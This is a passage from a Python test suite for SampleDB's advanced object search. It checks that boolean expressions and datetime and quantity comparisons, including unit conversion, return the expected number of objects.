objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_attribute_expression_and(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) and bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_attribute_expression_or(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) or bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) or bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
def test_find_by_datetime_attribute_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr == 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr == 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 == datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 == datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_datetime_on(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr on 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr on 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 on datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 on datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 on 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 on 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_datetime_less_than(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr < 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 < 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 < 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr < 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 < datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 < datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_datetime_before(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr before 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 before 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 before 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr before 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 before datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 before datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_datetime_greater_than(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr > 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 > 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 > 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr > 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 > datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 > datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_datetime_after(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr after 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 after 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 after 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr after 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 after datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 after datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_datetime_less_than_or_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr <= 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 <= 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 <= 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 <= 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr <= 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 <= datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 <= datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_datetime_greater_than_or_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr >= 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 >= 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 >= 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 >= 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr >= 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 >= datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 >= datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_quantity_attribute_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr == 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr == 0.00001km', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr == 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm == quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm == quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_quantity_attribute_not_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr != 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr != 0.00001km', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr != 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm != quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm != quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2kg != quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
def test_find_by_quantity_less_than(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr < 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm < 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
